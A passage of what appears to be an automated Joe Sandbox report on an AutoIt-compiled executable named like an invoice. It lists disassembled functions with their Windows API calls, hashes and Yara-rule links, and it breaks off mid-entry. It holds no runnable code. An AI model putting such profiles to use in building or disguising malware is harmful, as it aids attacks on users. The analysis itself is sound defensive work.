                        • String ID:
                        • API String ID: 3277943733-0
                        • Opcode ID: 800eea16ea20806114982031eab7f2a3092f9e0e2a1adbb859c3c73a29d61901
                        • Instruction ID: 8039f292f29fbed16e5f1b0cf888814d0eebcfd1057a990d149fe822a5a9da31
                        • Opcode Fuzzy Hash: 800eea16ea20806114982031eab7f2a3092f9e0e2a1adbb859c3c73a29d61901
                        • Instruction Fuzzy Hash: 87F054F56403047FF2202765AC45F773A5CFB0A754F404020BAC8D5186E77B5C0097A8
                        Function 00FE6C83 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                        Download Yara Rule
                        APIs
                        • EnterCriticalSection.KERNEL32(?), ref: 00FE6C8F
                          • Part of subcall function 00FE776D: _memset.LIBCMT ref: 00FE77A2
                        • _memmove.LIBCMT ref: 00FE6CB2
                        • _memset.LIBCMT ref: 00FE6CBF
                        • LeaveCriticalSection.KERNEL32(?), ref: 00FE6CCF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CriticalSection_memset$EnterLeave_memmove
                        • String ID:
                        • API String ID: 48991266-0
                        • Opcode ID: d78f5d9f127c35e6d21f64684d1517879bc3bfe8b42b654c08681dc09ef262a0
                        • Instruction ID: c1c6d34c45cba95e5da1309470813efef05ffe67afba4c71a562d4e8616eb7fe
                        • Opcode Fuzzy Hash: d78f5d9f127c35e6d21f64684d1517879bc3bfe8b42b654c08681dc09ef262a0
                        • Instruction Fuzzy Hash: A1F0F47A204104ABCF517F55EC85E4ABB2AFF45360F148055FE099E21AC735A911EBB4
                        Function 00FDA15C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FDA179
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDA18C
                        • GetCurrentThreadId.KERNEL32 ref: 00FDA193
                        • AttachThreadInput.USER32(00000000), ref: 00FDA19A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        • Opcode ID: be260b6609f8f4070e06366f6a7f7a6e40bd9bd058b5bf65e62a7324f0bca102
                        • Instruction ID: bc21f21ccef139715d7ce55c40ec5a92f2e1497af95c8b2a143a70753e7a7399
                        • Opcode Fuzzy Hash: be260b6609f8f4070e06366f6a7f7a6e40bd9bd058b5bf65e62a7324f0bca102
                        • Instruction Fuzzy Hash: B5E03931545229BBDB315BB2DC0CED73F1CEF2A7A1F048016F548C4050CA768541EBA0
                        Function 00F82218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000008), ref: 00F82231
                        • SetTextColor.GDI32(?,000000FF), ref: 00F8223B
                        • SetBkMode.GDI32(?,00000001), ref: 00F82250
                        • GetStockObject.GDI32(00000005), ref: 00F82258
                        • GetWindowDC.USER32(?,00000000), ref: 00FBC003
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FBC010
                        • GetPixel.GDI32(00000000,?,00000000), ref: 00FBC029
                        • GetPixel.GDI32(00000000,00000000,?), ref: 00FBC042
                        • GetPixel.GDI32(00000000,?,?), ref: 00FBC062
                        • ReleaseDC.USER32(?,00000000), ref: 00FBC06D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                        • String ID:
                        • API String ID: 1946975507-0
                        • Opcode ID: d80209e9326ab5d65a08c70917cbcc9cac61618852b8d99aa47f2036ca4c7dd7
                        • Instruction ID: 7d9905897b10cd01274d76cedb9138c8337bbc3f8d825dbd20e1827af535a72a
                        • Opcode Fuzzy Hash: d80209e9326ab5d65a08c70917cbcc9cac61618852b8d99aa47f2036ca4c7dd7
                        • Instruction Fuzzy Hash: FDE06D32500245ABEB725FB4FC0D7D83B10EB06332F008366FAA9880D587764A90EF11
                        Function 00FD8A3A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 00FD8A43
                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FD860E), ref: 00FD8A4A
                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FD860E), ref: 00FD8A57
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FD860E), ref: 00FD8A5E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CurrentOpenProcessThreadToken
                        • String ID:
                        • API String ID: 3974789173-0
                        • Opcode ID: f78426746d70450c0e0df9446f0fc34a6070ac52630edcfc4013295363014b07
                        • Instruction ID: ffa9682044de8bf43ed2a61bb7d7c9c28b30c2d44b77df0c28b0d0a968f97d7c
                        • Opcode Fuzzy Hash: f78426746d70450c0e0df9446f0fc34a6070ac52630edcfc4013295363014b07
                        • Instruction Fuzzy Hash: C5E08636A01212EFD7309FB06D0DB563BACEF50BE2F048819B2C5C9048DA3D9542E750
                        Function 00FC20B6 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                        Download Yara Rule
                        APIs
                        • GetDesktopWindow.USER32 ref: 00FC20B6
                        • GetDC.USER32(00000000), ref: 00FC20C0
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FC20E0
                        • ReleaseDC.USER32(?), ref: 00FC2101
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 4341cbe7f725aea4979f2fb06c038ed072c6fe26500cb473c24eb6f315d40de5
                        • Instruction ID: a2e037cb26172899c71c418726fa1f836b6a5b99b06a5bac2f0e33c875071d78
                        • Opcode Fuzzy Hash: 4341cbe7f725aea4979f2fb06c038ed072c6fe26500cb473c24eb6f315d40de5
                        • Instruction Fuzzy Hash: 2FE0E575800606EFCB62AFB0C808BAD7BB1EB4C310F108009F89A97210CB7D9141BF40
                        Function 00FC20CA Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • GetDesktopWindow.USER32 ref: 00FC20CA
                        • GetDC.USER32(00000000), ref: 00FC20D4
                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FC20E0
                        • ReleaseDC.USER32(?), ref: 00FC2101
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 32182019ab5077fe91edd36b6767860c6a45f67fb4b7ffba17e835abd413f5aa
                        • Instruction ID: aecbb1659536800bf52c2029073025d3862f3a4dd4e43df65acca79e00ce3c7f
                        • Opcode Fuzzy Hash: 32182019ab5077fe91edd36b6767860c6a45f67fb4b7ffba17e835abd413f5aa
                        • Instruction Fuzzy Hash: 8CE012B5800606AFCB62AFB0C8086AD7BF1EB4C310F108009F99AA7210CB7E9141AF40
                        Function 00FDB5B5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                        Download Yara Rule
                        APIs
                        • OleSetContainedObject.OLE32(?,00000001), ref: 00FDB780
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ContainedObject
                        • String ID: AutoIt3GUI$Container
                        • API String ID: 3565006973-3941886329
                        • Opcode ID: 1bc46cd09f91a579443404361459df217a722401c553788e85bc61f85edd41b5
                        • Instruction ID: ddc022c504af25e31f3d96287f1f6554864ebefc8e04b8b1db19a9921a410cf2
                        • Opcode Fuzzy Hash: 1bc46cd09f91a579443404361459df217a722401c553788e85bc61f85edd41b5
                        • Instruction Fuzzy Hash: FB9137B1600201EFDB14DF65C884B6ABBF9FF48710F19856EE9498B791DB70E841DB50
                        Function 00FEB038 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F9FE06: _wcscpy.LIBCMT ref: 00F9FE29
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • __wcsnicmp.LIBCMT ref: 00FEB0B9
                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00FEB182
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                        • String ID: LPT
                        • API String ID: 3222508074-1350329615
                        • Opcode ID: 885767d962d7cc375b6af10a00dbf55a7d07fc92105f94f90f18c1c7e4848ce3
                        • Instruction ID: 48fcfb42a4d0a36ceb7dffaf41a407d0f4916326521712e50f037f263da77153
                        • Opcode Fuzzy Hash: 885767d962d7cc375b6af10a00dbf55a7d07fc92105f94f90f18c1c7e4848ce3
                        • Instruction Fuzzy Hash: 2761A072E04215AFCB14EF95C895EAFB7B5EF08320F14406AF546AB351DB74AE40EB90
                        Function 00F92AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 00F92AC8
                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F92AE1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: 6a614dbdf482077efabe16364251218395b6ade719f668414dd79b2352c8d064
                        • Instruction ID: b681c6e4b1806d5ce9d3303fad074b24568dfd0151c0fdea544e24f5f42941e5
                        • Opcode Fuzzy Hash: 6a614dbdf482077efabe16364251218395b6ade719f668414dd79b2352c8d064
                        • Instruction Fuzzy Hash: CA5165724187449BD320BF60DC86BABBBF8FB84314F55884CF1DA81095DBB98528DB66
                        Function 00FE97DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F8506B: __fread_nolock.LIBCMT ref: 00F85089
                        • _wcscmp.LIBCMT ref: 00FE98CD
                        • _wcscmp.LIBCMT ref: 00FE98E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _wcscmp$__fread_nolock
                        • String ID: FILE
                        • API String ID: 4029003684-3121273764
                        • Opcode ID: 95a025bb7f81bd2e90c5e40ef40cdb6531c43bc260e19e8f698daae84bb97730
                        • Instruction ID: 02c8716250b1b2b675fa7bd41b5a7ba9aa46848955eb2b0112794239d180275e
                        • Opcode Fuzzy Hash: 95a025bb7f81bd2e90c5e40ef40cdb6531c43bc260e19e8f698daae84bb97730
                        • Instruction Fuzzy Hash: 9A41F671A0464ABBDF20AEA1CC85FEFB7BDDF45B10F000469F900E7181DAB99A0497A1
                        Function 00FF26A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00FF26B4
                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00FF26EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CrackInternet_memset
                        • String ID: |
                        • API String ID: 1413715105-2343686810
                        • Opcode ID: 0a7d5648a39038e32cb3572aa0250c680d5976827b154c87b8bdee4e7734a311
                        • Instruction ID: 66d0322237dd85400921e8be246cb7eae7990ca8b6cd719a244df4628fd596a8
                        • Opcode Fuzzy Hash: 0a7d5648a39038e32cb3572aa0250c680d5976827b154c87b8bdee4e7734a311
                        • Instruction Fuzzy Hash: C1313971805209AFCF11AFA4CC85EEEBFB9FF08310F100069E904A6166DB359A46EB61
                        Function 01007AA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 01007B93
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01007BA8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: 1bd7f005fd7e425a2e2faba3357b50acf509a5c56a525b6e4b4f717e48e0a1f4
                        • Instruction ID: 80b0cfc7f36646538a876d9e8bdaedad8123cd59287d447bd295ed0cf210637d
                        • Opcode Fuzzy Hash: 1bd7f005fd7e425a2e2faba3357b50acf509a5c56a525b6e4b4f717e48e0a1f4
                        • Instruction Fuzzy Hash: BF410C74A017099FEB55CF68C881BDA7BF5FB09300F5001AAEA84AB381D775A941CFA0
                        Function 01006A95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?,?,?,?), ref: 01006B49
                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01006B85
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$DestroyMove
                        • String ID: static
                        • API String ID: 2139405536-2160076837
                        • Opcode ID: 614804e1fc0961c218364c2fab4deb9df4ed1735373cd864dfa788c8e3f3411d
                        • Instruction ID: a4c4d29dcf94cc0c8ac04be934eee9b28040b64fbeaed2f47fe251b92e868d29
                        • Opcode Fuzzy Hash: 614804e1fc0961c218364c2fab4deb9df4ed1735373cd864dfa788c8e3f3411d
                        • Instruction Fuzzy Hash: F1317E71100604AEEB12DF68CC80BFB77E9FF48724F108619F9A697190DB35A891DB60
                        Function 00FE2B9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00FE2C09
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FE2C44
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: bce1c841326eb50407538fab8af27a8cff15e653a79b7b90c85476699c18f0e0
                        • Instruction ID: f9037eed5e33226139aa69cada4bf4a5eccf0f46e4c7aa4fdc574a3e68f01000
                        • Opcode Fuzzy Hash: bce1c841326eb50407538fab8af27a8cff15e653a79b7b90c85476699c18f0e0
                        • Instruction Fuzzy Hash: 8D31E571A002899FDB758E5EDD857AEBBBCFB05370F244019E985A61A0F7709A40EB11
                        Function 00FF3AFF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                        Download Yara Rule
                        APIs
                        • __snwprintf.LIBCMT ref: 00FF3B7C
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __snwprintf_memmove
                        • String ID: , $$AUTOITCALLVARIABLE%d
                        • API String ID: 3506404897-2584243854
                        • Opcode ID: 350b1dc35db9466ff4aa996bb6d51750ea9445d0115bc62124dd7ef89fbfc1c3
                        • Instruction ID: 4ea8af3a4c5d47b8e4be251c45b328b9c4e6f0827491ceb7e9cce019dd693db6
                        • Opcode Fuzzy Hash: 350b1dc35db9466ff4aa996bb6d51750ea9445d0115bc62124dd7ef89fbfc1c3
                        • Instruction Fuzzy Hash: 12218031600219ABCF14FFA4CC92EED77A9BF84700F544499F605AB241DB34EA45EBA1
                        Function 01006706 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01006793
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0100679E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: eb30f6e081a2723bffaf92acd5aed0639de675b81a3390f3b4f4a64f57dfe2cc
                        • Instruction ID: 55ffc709706c8514582351bdc42a4db03879aafacda70ad7cc06a066ed8fb9b3
                        • Opcode Fuzzy Hash: eb30f6e081a2723bffaf92acd5aed0639de675b81a3390f3b4f4a64f57dfe2cc
                        • Instruction Fuzzy Hash: 561163752001096FFF639E68DC80EAB37ABFB88364F104125F998972D1E6769C6197A0
                        Function 01006C39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                          • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                          • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                        • GetWindowRect.USER32(00000000,?), ref: 01006CA3
                        • GetSysColor.USER32(00000012), ref: 01006CBD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                        • String ID: static
                        • API String ID: 1983116058-2160076837
                        • Opcode ID: 8ec62dfb1a264808893db1fa4355e0e41ad820c78ef3f98484b5295aa9bdbc2b
